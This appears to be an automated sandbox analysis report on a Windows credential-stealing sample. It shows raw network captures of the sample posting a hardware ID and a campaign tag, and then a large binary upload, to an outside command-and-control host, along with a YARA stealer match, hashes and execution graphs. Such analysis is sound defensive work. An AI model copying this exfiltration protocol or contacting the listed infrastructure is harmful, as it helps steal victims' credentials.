                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7UDBJ54YreuJ1eauZ9YBAcHDTpMNg4wjTLfzx8rsUzXVC0%2BE2hG1Yh46xnNuWl34I%2B0z%2B5eSaOAHc%2F4MtOdgRqdCWT7c6yC23KvFjz0BenOi7seA%2FPCAUl2Gi14xZpGesP2hh0c%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e70eca18436e-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21322&delivery_rate=1745367&cwnd=235&unsent_bytes=0&cid=d57ebbb405ba0f0a&ts=881&x=0"
                                                                              2024-11-24 13:56:29 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-24 13:56:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                              5          | 192.168.2.7 | 49722       | 172.67.162.84  | 443              | 7472 | C:\Users\user\Desktop\file.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-11-24 13:56:30 UTC | 273 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=BI31JNVD
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1183
                                                                              Host: property-imper.sbs
                                                                              2024-11-24 13:56:30 UTC1183OUTData Raw: 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 42 49 33 31 4a 4e 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                              Data Ascii: --BI31JNVDContent-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--BI31JNVDContent-Disposition: form-data; name="pid"1--BI31JNVDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--BI31JNVDContent-Di
2024-11-24 13:56:31 UTC | 1020 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=lf892c7r1v4kafbbtdlrted9bb; expires=Thu, 20-Mar-2025 07:43:10 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAC%2F30RfL5e1%2FpC3%2FQM96lc44FWJ8LuDLXk1epNiGVWB5sOJbKbzyQYsp%2B2rtHpoxLMK9DZ2h36vi4uWxFY9X%2Fq7PjP6gI1NldalkGZCuxAN16b%2BOcv6Ytsy1ZPgHti5QBVbuVQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e71d9cc0729b-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1827&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2092&delivery_rate=1592148&cwnd=249&unsent_bytes=0&cid=9bf9ffc239282290&ts=730&x=0"
2024-11-24 13:56:31 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
2024-11-24 13:56:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49728 | 172.67.162.84 | 443 | 7472 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-24 13:56:33 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=HO9HQRQFY2M9
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 550291
                                                                              Host: property-imper.sbs
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 2d 2d 48 4f 39 48 51 52 51 46 59 32 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 32 35 31 31 39 35 46 46 45 34 43 43 34 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 48 4f 39 48 51 52 51 46 59 32 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 4f 39 48 51 52 51 46 59 32 4d 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 4f 39 48 51 52 51 46
                                                                              Data Ascii: --HO9HQRQFY2M9Content-Disposition: form-data; name="hwid"12251195FFE4CC48D7CBBD6DF28D3732--HO9HQRQFY2M9Content-Disposition: form-data; name="pid"1--HO9HQRQFY2M9Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HO9HQRQF
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 1f 6d 48 dc 68 c7 ca 45 05 0a 89 c9 4b 23 12 4b 9a 53 6f 16 81 cf 1e aa 01 32 00 07 26 7b 91 ec 0d bf a1 e0 5d 09 ab 37 f4 f2 10 94 fa a8 f0 27 ea 4f b6 1a 82 db 4c 37 72 04 e7 df 25 6a 62 e2 10 5b ef 85 92 4f 33 51 24 d7 2e c5 23 8c 87 b4 ba 31 64 7d 3a 23 8c 8c 0e 9f 2c 1b c3 ac 9a 35 28 52 89 c3 43 75 03 49 63 cc 84 b6 04 8e 67 da 95 05 07 53 3a 3f 47 07 99 28 4c d1 45 f1 43 df d1 d1 a2 f7 8c b6 2f a2 60 1a 34 b6 b8 5d 94 ba 83 9a 56 1f 72 54 80 f0 0e 24 06 ee e1 41 db e8 e9 7f 8d 29 ba 38 1f 3e 2a 0d ba e6 b5 81 9d b6 9e 33 a2 61 12 25 52 bc 14 00 22 fb 69 7f f8 6e 92 8e 45 51 4a aa 89 91 2a f6 8c 79 96 08 75 7a 55 89 c9 8b d6 21 77 d0 c1 38 c4 13 88 62 4a 2f 34 4a be 5c 40 cb fe 98 44 c3 7f 9d 50 e5 b4 a9 66 f1 f8 5a cc c7 60 ed d2 26 1f a6 7e 8b e2
                                                                              Data Ascii: mHhEK#KSo2&{]7'OL7r%jb[O3Q$.#1d}:#,5(RCuIcgS:?G(LEC/`4]VrT$A)8>*3a%R"inEQJ*yuzU!w8bJ/4J\@DPfZ`&~
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: a7 5b 20 ee 30 3b 06 a2 44 7a 67 40 48 27 12 ad 58 e6 3a 45 c7 16 d6 11 5d 44 98 3d 3f ee 5f 5f 7a 2b b5 ac 68 cd 20 f7 1e 5f c4 b9 83 c1 76 e7 94 20 21 01 99 e1 4e 6a 64 e8 85 2f 73 85 88 e8 0c 34 0a 02 65 67 f6 e6 69 e0 08 42 24 37 8c 94 b0 b3 04 55 0f ce b3 01 52 e1 f0 db 65 b7 1c 5f 01 a3 ac de 33 0a 1a 0a 17 cf 0d 9d 79 e3 b5 bc 7d e5 d4 70 e9 83 99 b2 1b 66 fa 03 79 2f 39 61 3b 2d 73 77 10 ba f7 b3 df 20 e7 fe 5e df 7a fc 39 8c c9 dd 93 a8 d1 4f de 5c 58 39 87 03 0c 97 d7 dc 5a 46 73 eb f4 50 60 b9 d1 6c 29 aa 89 4a 1a 66 20 98 07 7b fc 79 75 e8 d0 2f 57 a3 34 fb be 80 50 c7 81 16 b1 e7 a3 6d 75 d1 df 85 92 67 aa f4 13 f8 de 68 59 66 54 ff 8b 0e bf aa e9 e8 be f1 5d 3a 74 bd 5c 17 eb aa 50 1c c9 e7 c8 ac 8c 7e bf 66 e5 cc 7d 75 56 63 0c f7 de bd 26
                                                                              Data Ascii: [ 0;Dzg@H'X:E]D=?__z+h _v !Njd/s4egiB$7URe_3y}pfy/9a;-sw ^z9O\X9ZFsP`l)Jf {yu/W4PmughYfT]:t\P~f}uVc&
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 71 f4 84 4f 0f a9 fa 9d 1b 34 b5 e8 f4 ca 06 14 9d fb dc 19 e2 a7 03 d2 e1 48 73 3f 96 4d 63 46 1a 06 97 29 37 1e 6d df 97 33 67 94 3b 64 dd 7b d5 30 86 f3 72 af b8 e9 51 ec 48 63 49 e8 d4 66 01 91 98 48 34 37 a4 93 6d fb 32 72 e9 d7 e6 0c 72 97 25 ca 9a 77 3f ec 8a 45 bc 36 d7 af c5 86 9d 77 d4 03 24 cc ae c4 a7 99 04 2b cf 28 8c 3a cf 74 ce c9 dc c0 a5 3e 6d 81 ae ec 52 35 a4 26 f1 b9 7e d3 6f ff d1 79 63 2e 4d 07 77 4c 56 af 1d e8 a9 54 c5 d7 56 fb d0 c0 bd a4 93 c5 ab c1 86 bb 8a 52 a4 da 35 af 9a 43 7d 10 a1 46 c2 0c 97 86 60 3c 6f 0c f7 66 71 67 33 06 73 be 7d e2 66 13 b6 b1 31 0f 45 c7 b4 7e cf 5b ee 09 2b bd e8 bd ed 93 a6 2c fe f1 43 d5 e6 4d 5f f1 b1 b4 87 90 7e e9 b6 e7 e9 f4 a7 46 7a 70 c5 25 e4 d3 3d df 15 71 cc d5 93 b0 9b ee b9 d0 ff c2 d1
                                                                              Data Ascii: qO4Hs?McF)7m3g;d{0rQHcIfH47m2rr%w?E6w$+(:t>mR5&~oyc.MwLVTVR5C}F`<ofqg3s}f1E~[+,CM_~Fzp%=q
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 66 6d 50 da 4f aa 94 c2 58 4b 0a cd 26 88 76 9b f7 9a 79 3f 63 ce 76 7f 3d 7d f2 95 38 48 f9 34 d0 af 42 29 df d8 43 d7 7f 14 e8 ee d9 b2 6c 50 38 f0 61 a8 47 47 f6 cc 40 60 7f c8 ed c3 3c 18 ee cd a3 92 33 6b 09 09 1c 89 d4 7c f9 5d bb b8 c0 1e 25 0c 43 61 65 fa 20 5b 55 8d ea f0 62 be 4a f7 19 4f 52 ea d7 c7 5b 19 fb 9c f0 f9 09 f9 f1 5f 65 09 0b 92 f3 25 b5 fd bb f8 7f c9 c7 04 d2 0d 59 b1 f5 5b 73 3e c4 87 0b 89 f1 46 35 46 1e e8 8e ae bc 94 79 17 19 24 81 3d f7 25 ad c6 40 57 2a b1 d9 c0 76 a6 fa 59 68 32 1a 89 6b 1e f6 6f 2c 32 c1 a4 e7 6f 84 9b c9 85 ca ad 71 73 4d ae 17 7c 95 0b ba 75 f6 79 84 87 5e d7 87 d7 70 02 5d b9 fd 9d db 48 05 c6 9d b0 b6 7e 2a bf e1 52 f0 9d 90 f4 b9 eb 6d 2a af 6e 1a d8 09 ca bd f9 9e d0 7c 3c 19 ed 59 48 51 1d 3d 1c a1
                                                                              Data Ascii: fmPOXK&vy?cv=}8H4B)ClP8aGG@`<3k|]%Cae [UbJOR[_e%Y[s>F5Fy$=%@W*vYh2ko,2oqsM|uy^p]H~*Rm*n|<YHQ=
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 3f 89 0e 80 f4 18 87 58 89 ea ed 22 d4 d3 b7 1b 9f c7 53 24 1d 67 f9 c0 c1 c6 e9 3f 29 47 88 48 b6 46 60 49 3a fa f7 fc 67 02 8b 00 73 97 9d 83 fe 85 f4 84 c4 bc 1c 46 38 b5 a5 74 cb a7 02 2f 74 31 65 55 ec 3e a6 2c 6d f9 59 43 29 49 4e 86 36 c5 75 7e 7f 7a 29 24 38 cd 67 68 20 c5 e1 0b 35 d2 44 ab 72 f9 8b ce 28 0a ef 59 6f 0b e4 81 86 84 46 75 ec 76 a6 fc 78 a2 4a 2b ce 63 e0 72 ab 75 84 cf 65 56 3e 9b b8 f9 0e eb 42 1e b6 0b bd 6b 02 a5 07 17 e5 1a da a2 8c 76 d4 45 d4 35 08 85 d1 20 07 55 e9 36 2c 09 1c e5 18 f9 a7 ca d5 ea 17 42 16 f8 f4 73 d9 d1 c7 4a b7 c1 12 63 7d 44 36 57 fe 40 36 29 d1 9c ac c1 bb 6c 6f f4 b5 fe 1e 53 bb 78 7c a4 54 91 e5 dd 5c 21 3e 5a 2d e1 3a 24 77 15 4a 6f e6 6e 77 31 d2 8b f9 68 8f a2 f4 b9 48 d2 a0 89 b3 d1 72 4c 30 31 96
                                                                              Data Ascii: ?X"S$g?)GHF`I:gsF8t/t1eU>,mYC)IN6u~z)$8gh 5Dr(YoFuvxJ+crueV>BkvE5 U6,BsJc}D6W@6)loSx|T\!>Z-:$wJonw1hHrL01
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 99 6b f1 87 7a ec 5b 7e 39 8f 79 3e 0d 49 52 00 b1 6d 15 73 39 53 6f 5d b9 1f 90 5c 97 8a 1f 47 29 5e a0 ef bb 8e e9 c6 bd 18 ff f0 57 d0 c6 05 c0 7c bb 10 51 be 35 be 91 27 e2 43 3b 33 ad 1f e8 d9 9d 61 bc 33 dc bb 69 f5 5b 3e e6 4f c1 11 cc d2 a3 5c ff b1 2b 19 e6 62 ae 3b df 4f 17 6b 8a bb 3d c6 0e c4 41 c8 a1 10 a9 b9 7f 6e 9f 94 7a e9 4b c0 20 47 6e d8 eb 41 8e ba f3 ad 84 da 93 e9 a9 22 66 82 ac c2 91 89 09 01 35 bd d6 24 94 fd 1d ae f5 89 43 15 ff 67 42 e4 56 67 bc 2b 62 74 17 f4 54 ee f6 10 5e 89 63 d3 2e fd c6 15 4c b5 bf e8 d0 b4 f9 d6 6e 7a 1f a2 84 65 17 b9 82 66 2b 7f c9 a6 91 6c d0 11 4d 40 c3 28 f2 39 45 a0 fe 5f 10 c6 fa d7 91 18 9f 5f d2 fe 2e 83 ed 86 0b fc 21 52 fb 09 56 4f 63 65 91 65 5e 00 96 00 f8 5f f3 9d cd 9a 13 60 3a 82 10 84 68
                                                                              Data Ascii: kz[~9y>IRms9So]\G)^W|Q5'C;3a3i[>O\+b;Ok=AnzK GnA"f5$CgBVg+btT^c.Lnzef+lM@(9E__.!RVOcee^_`:h
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 58 76 9b 84 65 e5 67 04 fa 29 0f ca bd 3b d2 80 20 3c dc da 5e e2 32 6f 4e 68 f5 4a 79 db 6d 4e 0d 15 2e 8a 89 ce 9b bc ff 9e 14 31 eb a2 cb 3a 4d e6 84 72 c9 25 11 cc c2 e2 5b 93 13 fc 21 98 d1 c7 6b 7a c8 9f 41 1f db b5 4f 45 74 d6 eb e6 8d 52 93 bc be c5 94 f5 c7 cf 63 d7 ec b4 d9 58 e6 07 f9 86 63 31 ef 5c 2d 67 75 cd 4d d1 e4 e7 9c 8c 77 db a2 c6 1b d9 54 b1 35 38 00 0e e2 65 07 c4 0f 7d 2b b8 29 a1 b8 11 8e 41 32 62 ca 53 69 6e 73 69 8e 08 a7 cb 3b d3 f6 13 da 44 3f 04 a0 3a cb b5 2c b5 0c 38 aa 06 88 3f 88 06 59 82 09 cd c4 dc 58 63 0d db 46 10 05 ca 41 e0 d5 84 eb 63 7e cf 44 c3 1b 77 09 3e fc 3d 95 b0 51 96 97 b0 75 dc 8e b1 79 39 53 d6 23 92 9d 34 91 4d f3 aa 8f 54 63 27 ec a7 a1 50 da df a8 70 d4 1b d2 ee c6 30 fd a5 e4 6f 54 75 76 47 73 51 e1
                                                                              Data Ascii: Xveg); <^2oNhJymN.1:Mr%[!kzAOEtRcXc1\-guMwT58e}+)A2bSinsi;D?:,8?YXcFAc~Dw>=Quy9S#4MTc'Pp0oTuvGsQ
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: 2d 2a 38 58 96 0c 7a 42 9d 30 fb 32 a1 18 36 ae e2 02 86 9e 60 f1 a0 90 53 3a ba 43 f0 80 1b 25 fc e6 23 8f 0f 4e b1 0b db f0 22 0a 61 8e fc 2c 33 87 fa d2 e0 a9 5b a8 0d 55 a3 6d 7f a1 0d 48 e4 46 92 47 18 1a c4 aa f0 44 74 86 98 d5 b5 d3 56 95 ea 97 2f 45 29 a9 54 93 56 a0 5f 66 e9 33 b9 f7 5c 67 44 ba 82 89 71 11 b1 71 b1 77 0e ab c9 3b c5 8a cd 4a 2e 21 04 a7 2c 8b e3 3d 06 03 32 b2 71 3b 98 9d 3a e9 f5 3a 11 67 2f 51 fb 11 05 ed fd 38 6f 0f be e9 9f 6f 56 e8 3b 96 b5 92 ad cd 0c 05 6d 27 b1 d3 2e af 71 3b ab d8 d8 65 89 bf ef 96 2d d6 de 1e 12 6f f5 88 4b 60 ed 1e 55 2c 14 1c 0e 71 e7 7d 36 2b e0 2f 96 83 1f dc c6 f4 17 45 f0 c4 0a 0d ff f2 9d 9b a3 44 dd 4f ca b4 fc 87 94 14 a2 cd f3 ba 3b 92 9d 66 cd 97 c4 7c 44 6f d5 7d aa c5 ae ab 2f f3 24 31 cb
                                                                              Data Ascii: -*8XzB026`S:C%#N"a,3[UmHFGDtV/E)TV_f3\gDqqw;J.!,=2q;::g/Q8ooV;m'.q;e-oK`U,q}6+/EDO;f|Do}/$1
2024-11-24 13:56:33 UTC | 15331 | OUT | Data Raw: e3 87 8f 59 fd 64 18 a3 fc 59 9a 2c d6 03 7f fc 48 b4 21 e9 f3 61 dd f7 83 0b 9a 89 a7 47 4b b2 16 b5 18 8f b1 88 3f e2 83 4e 0d b7 a8 cb 7d 47 2e 34 db 5f de 4f 4f 05 75 8a 5e 10 3c f4 28 a1 55 12 e8 5d 38 c5 07 1e c9 87 1b f2 83 59 87 bf df 47 ef a0 79 eb 51 4f 16 78 42 ae e5 b4 f6 36 d9 82 27 fc 79 c5 45 db 70 ad a5 98 10 24 e0 87 f2 79 ee 26 d6 df f9 2a fb fb 4a ae 30 cd 6d 08 10 82 30 e7 21 0b 34 7c 8e 5d cf 21 5b 5a 46 e8 56 71 f1 34 9e 1e 1e dd 28 c1 d9 3a c6 48 32 0e 4c e7 d3 6c 54 68 95 79 9a 66 f8 d5 51 91 58 f3 82 be fa ca ed db c3 0f 7c 6c b7 30 16 04 fc 1b d8 bf 58 ae ea fc 1f 03 28 bb 4d e0 c5 53 9b 97 01 dc 29 d0 b0 c1 c4 90 b7 e1 dd d2 90 56 f1 d9 23 cf 63 44 eb 8c f1 4a 34 e2 89 4f ba b7 19 45 e0 96 a2 b5 62 b0 97 2d a0 c4 8f 28 c2 4a 87
                                                                              Data Ascii: YdY,H!aGK?N}G.4_OOu^<(U]8YGyQOxB6'yEp$y&*J0m0!4|]![ZFVq4(:H2LlThyfQX|l0X(MS)V#cDJ4OEb-(J
2024-11-24 13:56:36 UTC | 1026 | IN | HTTP/1.1 200 OK
                                                                              Date: Sun, 24 Nov 2024 13:56:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=lb46jnbgtfh9gmh0ios6lfqb1c; expires=Thu, 20-Mar-2025 07:43:13 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJ%2FOzv3Dp5i7fdtKnlM%2BStNx0gc638w2D6r1AdoNWSpRBoNpA56o%2By0h5wTk9edrUm8szamkYg%2FMn5nEEGyNIF2UEMREDRUVuZw3at6oGRq%2B8CC1moi3jNzLtGmwP26Qwe%2FA5j8%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e79e72ccb5c4392-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1853&sent=193&recv=571&lost=0&retrans=1&sent_bytes=4228&recv_bytes=552768&delivery_rate=146241&cwnd=232&unsent_bytes=0&cid=4808db1f4de33796&ts=3773&x=0"



Target ID: 0
Start time: 08:56:14
Start date: 24/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xbb0000
File size: 1'865'728 bytes
MD5 hash: 5E1EE83DF7FD0F85791575EED5ABFFA8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1420219520.000000000155F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                                                                Execution Graph

                                                                                Execution Coverage:65.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:100%
                                                                                Total number of Nodes:17
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 699 bbe35b 700 bbe361 699->700 701 bbe370 CoUninitialize 700->701 702 bbe3a0 701->702 702->702 713 bb89a0 715 bb89af 713->715 714 bb8cb3 ExitProcess 715->714 703 be9030 704 be9090 703->704 705 be91b1 SysAllocString 704->705 709 be966a 704->709 707 be91df 705->707 706 be969c GetVolumeInformationW 712 be96ba 706->712 708 be91ea CoSetProxyBlanket 707->708 707->709 708->709 711 be920a 708->711 709->706 710 be9658 SysFreeString SysFreeString 710->709 711->710

                                                                                Callgraph

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 be9030-be9089 1 be9090-be90c6 0->1 1->1 2 be90c8-be90e4 1->2 4 be90e6 2->4 5 be90f1-be913f 2->5 4->5 7 be968c-be96b8 call bef9a0 GetVolumeInformationW 5->7 8 be9145-be9177 5->8 13 be96bc-be96df call bd0650 7->13 14 be96ba 7->14 9 be9180-be91af 8->9 9->9 11 be91b1-be91e4 SysAllocString 9->11 18 be91ea-be9204 CoSetProxyBlanket 11->18 19 be9674-be9688 11->19 20 be96e0-be96e8 13->20 14->13 21 be966a-be9670 18->21 22 be920a-be9225 18->22 19->7 20->20 23 be96ea-be96ec 20->23 21->19 25 be9230-be9262 22->25 26 be96fe-be972d call bd0650 23->26 27 be96ee-be96fb call bb8330 23->27 25->25 28 be9264-be92df 25->28 36 be9730-be9738 26->36 27->26 35 be92e0-be930b 28->35 35->35 37 be930d-be933d 35->37 36->36 38 be973a-be973c 36->38 49 be9658-be9668 SysFreeString * 2 37->49 50 be9343-be9365 37->50 39 be974e-be977d call bd0650 38->39 40 be973e-be974b call bb8330 38->40 46 be9780-be9788 39->46 40->39 46->46 48 be978a-be978c 46->48 51 be979e-be97cb call bd0650 48->51 52 be978e-be979b call bb8330 48->52 49->21 57 be964b-be9655 50->57 58 be936b-be936e 50->58 61 be97d0-be97d8 51->61 52->51 57->49 58->57 60 be9374-be9379 58->60 60->57 63 be937f-be93cf 60->63 61->61 64 be97da-be97dc 61->64 70 be93d0-be9416 63->70 65 be97ee-be97f5 64->65 66 be97de-be97eb call bb8330 64->66 66->65 70->70 71 be9418-be942d 70->71 72 be9431-be9433 71->72 73 be9439-be943f 72->73 74 be9636-be9647 72->74 73->74 75 be9445-be9452 73->75 74->57 76 be948d 75->76 77 be9454-be9459 75->77 80 be948f-be94b7 call bb82b0 76->80 79 be946c-be9470 77->79 82 be9472-be947b 79->82 83 be9460 79->83 89 be94bd-be94cb 80->89 90 be95e8-be95f9 80->90 87 be947d-be9480 82->87 88 be9482-be9486 82->88 86 be9461-be946a 83->86 86->79 86->80 87->86 88->86 91 be9488-be948b 88->91 89->90 92 be94d1-be94d5 89->92 93 be95fb 90->93 94 be9600-be960c 90->94 91->86 95 be94e0-be94ea 92->95 93->94 96 be960e 94->96 97 be9613-be9633 call bb82e0 call bb82c0 
94->97 98 be94ec-be94f1 95->98 99 be9500-be9506 95->99 96->97 97->74 101 be9590-be9596 98->101 102 be9508-be950b 99->102 103 be9525-be9533 99->103 109 be9598-be959e 101->109 102->103 105 be950d-be9523 102->105 106 be95aa-be95b3 103->106 107 be9535-be9538 103->107 105->101 110 be95b9-be95bc 106->110 111 be95b5-be95b7 106->111 107->106 112 be953a-be9581 107->112 109->90 114 be95a0-be95a2 109->114 115 be95be-be95e2 110->115 116 be95e4-be95e6 110->116 111->109 112->101 114->95 117 be95a8 114->117 115->101 116->101 117->90
                                                                                APIs
                                                                                • SysAllocString.OLEAUT32(13C511C2), ref: 00BE91B7
                                                                                • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00BE91FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1498033939.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1498010414.0000000000BB0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498033939.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498104620.0000000000C07000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000E74000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000E9B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498124678.0000000000EB4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498460386.0000000000EB5000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498603632.0000000001052000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498625500.0000000001053000.00000080.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bb0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: AllocBlanketProxyString
                                                                                • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                                                                • API String ID: 900851650-4011188741
                                                                                • Opcode ID: 13276b3832c0cc1b3db4dc6c83daf30e64b29b2161ea3213546a9edb9a22defe
                                                                                • Instruction ID: 812934fdc0cace81acf7e042fcb9aa46bcb92a7272f98943605fd3589540ca49
                                                                                • Opcode Fuzzy Hash: 13276b3832c0cc1b3db4dc6c83daf30e64b29b2161ea3213546a9edb9a22defe
                                                                                • Instruction Fuzzy Hash: 8D2241B1908340AFE724CF21C881B6BBBE6EF95314F148A5CF4959B2C1E774D909CB92

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
